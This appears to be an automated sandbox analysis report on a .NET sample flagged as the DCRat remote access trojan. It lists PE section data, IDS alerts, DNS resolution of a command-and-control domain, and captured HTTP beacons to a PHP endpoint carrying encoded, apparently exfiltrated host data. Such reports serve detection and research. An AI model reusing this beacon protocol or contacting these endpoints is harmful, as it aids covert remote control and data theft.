                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x4e584 | 0x4e600 | a17f76349c96eb580453f43c3797a928 | False | 0.42962208433014354 | data | 5.777886555534046 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x52000 | 0x218 | 0x400 | 7d9273007d21dbe67cf2266be7e636fd | False | 0.2626953125 | data | 1.8344366501290008 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54000 | 0xc | 0x200 | af9f2903ff6224c06575ff9f48e919ef | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x52058 | 0x1c0 | ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.5223214285714286
DLL | Import
mscoree.dll | _CorExeMain
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-31T10:15:43.077373+0200 | TCP | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 80 | 49778 | 188.114.97.3 | 192.168.2.4
2024-08-31T10:14:16.499938+0200 | TCP | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 80 | 49763 | 188.114.97.3 | 192.168.2.4
2024-08-31T10:11:57.441180+0200 | TCP | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 49730 | 80 | 192.168.2.4 | 188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Aug 31, 2024 10:14:04.942122936 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:05.668186903 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:05.852395058 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.680989981 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.681895018 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.686125040 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:10.686172962 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.686682940 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:10.686744928 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.686887980 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.691646099 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:10.691770077 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:11.483720064 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:11.525377989 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.494734049 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.499938011 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:16.499991894 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.500957012 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.505744934 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:16.505803108 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.505985975 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.510893106 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:16.510902882 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:17.249116898 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:17.293445110 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.260144949 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.265023947 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:22.265095949 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.265259981 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.270234108 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:22.270256996 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:22.996205091 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:23.039881945 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.009744883 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.009744883 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.014719963 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.014925957 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.015688896 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.015688896 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.015846014 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.021277905 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.021380901 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.572233915 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.618051052 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.705043077 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.758632898 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.712949991 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.712954044 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.717854023 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:33.717952967 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.718043089 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:33.718046904 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.718116999 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.722805977 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:33.722939968 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:34.443567991 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:34.602394104 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.447510004 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.447510958 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.452395916 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:39.452529907 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.452686071 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.452718019 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:39.452912092 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.457612038 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:39.457669020 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:40.161600113 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:40.211783886 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.165518999 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.166462898 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.171022892 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.171082020 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.171364069 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.171431065 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172364950 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172538042 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172601938 CEST4974480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172708035 CEST4975780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172755003 CEST4974780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.177181959 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.177298069 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.912075043 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:46.009402037 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.915859938 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.918860912 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.921050072 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:50.921102047 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.923609972 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:50.923667908 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.925854921 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.930658102 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:50.930999994 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:51.694890976 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:51.805557966 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.696700096 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.697675943 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.705300093 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:56.705377102 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.705468893 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.705745935 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:56.705791950 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.710341930 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:56.710593939 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:57.466830969 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:57.508759975 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.477890968 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.478924036 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.483541012 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:02.483603001 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.483732939 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:02.483800888 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.483905077 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.488756895 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:02.489159107 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:03.243643045 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:03.295084000 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.259485960 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.259968042 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.264858007 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:08.264955997 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.264978886 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:08.265074968 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.265152931 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.270057917 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:08.270219088 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:09.023008108 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:09.071201086 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.025434017 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.025659084 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.031586885 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.032162905 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.032264948 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.032264948 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.032521009 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.038412094 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.038753033 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.768651009 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.768927097 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.775453091 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.775505066 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.801438093 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.806513071 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:19.809547901 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.813437939 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.822865009 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:19.822876930 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:20.526448965 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:20.595700979 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.742005110 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.742614031 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.747634888 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:25.747648954 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:25.747766018 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.747766018 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.747983932 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.753068924 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:25.753077984 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:26.482889891 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:26.576679945 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.502337933 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.502835989 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.509509087 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:31.509699106 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.509812117 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:31.509994984 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.510073900 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.515680075 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:31.515986919 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:32.248987913 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:32.289987087 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.264101028 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.265393972 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.306761980 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:37.306828022 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.306967020 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.307075977 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:37.307121992 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.314841032 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:37.315331936 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:38.066867113 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:38.121459007 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.072146893 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.072793007 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.077373028 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.077428102 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.077614069 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.077703953 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.077822924 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.082899094 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.082926035 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.792327881 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:44.008378983 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:44.009452105 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:44.009533882 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.819789886 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.820271969 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.825079918 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:48.825134993 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.825257063 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:48.825321913 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.830816031 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.835655928 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:48.835766077 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:49.567601919 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:49.619513988 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.572088003 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.572896004 CEST4978180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.747196913 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:54.747296095 CEST4978180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.747430086 CEST4978180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.747797966 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:54.747849941 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.753592968 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:54.753946066 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:55.499761105 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:55.696244955 CEST4978180192.168.2.4188.114.97.3
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Aug 31, 2024 10:11:56.717282057 CEST | 64276 | 53 | 192.168.2.4 | 1.1.1.1
                              Aug 31, 2024 10:11:56.732362032 CEST | 53 | 64276 | 1.1.1.1 | 192.168.2.4
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Aug 31, 2024 10:11:56.717282057 CEST | 192.168.2.4 | 1.1.1.1 | 0x4a7a | Standard query (0) | mioww.uebki.one | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Aug 31, 2024 10:11:56.732362032 CEST | 1.1.1.1 | 192.168.2.4 | 0x4a7a | No error (0) | mioww.uebki.one | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                              Aug 31, 2024 10:11:56.732362032 CEST | 1.1.1.1 | 192.168.2.4 | 0x4a7a | No error (0) | mioww.uebki.one | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                              • mioww.uebki.one
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.4 | 49730 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:11:56.743779898 CEST | 572 | OUT | GET /L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:11:57.440989971 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L0KYhfXKRV6jL9XYfbgXxWy8NusJW31jVQ9DsjPMAK2BWUIrtN0zHvVgQoV094gQy8UlQVIzGjkZqSvHSb6Wisa44NWSlcJZOhWT7RYvPmVRmZQVHYJoV4WJEiMiGRlazuI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d822e9441bd-EWR
                              alt-svc: h3=":443"; ma=86400
                              Aug 31, 2024 10:11:58.639460087 CEST | 2103 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRK [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:11:58.911325932 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:58 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4VAsPxuIai%2BN5iTSU7LR2uXa1qM2gu2qXZ928v9aTYJxgCVBuyWk21GTCEtFDyT0aVtr8ZwkoHML8ZzuEbmjeJmffsr1e4OedvdakDS%2FWEzPDXNzjwnYo%2FfzrXFUMj%2FlNM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d8bcf1341bd-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.4 | 49731 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:11:58.646229982 CEST | 705 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiIlVGM2MTO4IWZwYmM1MjNlBDMkJzM2EzMjhTNxUmM2cjN1cjNzADO3IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:11:59.308053970 CEST | 615 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:59 GMT
                              Content-Type: text/html; charset=UTF-8
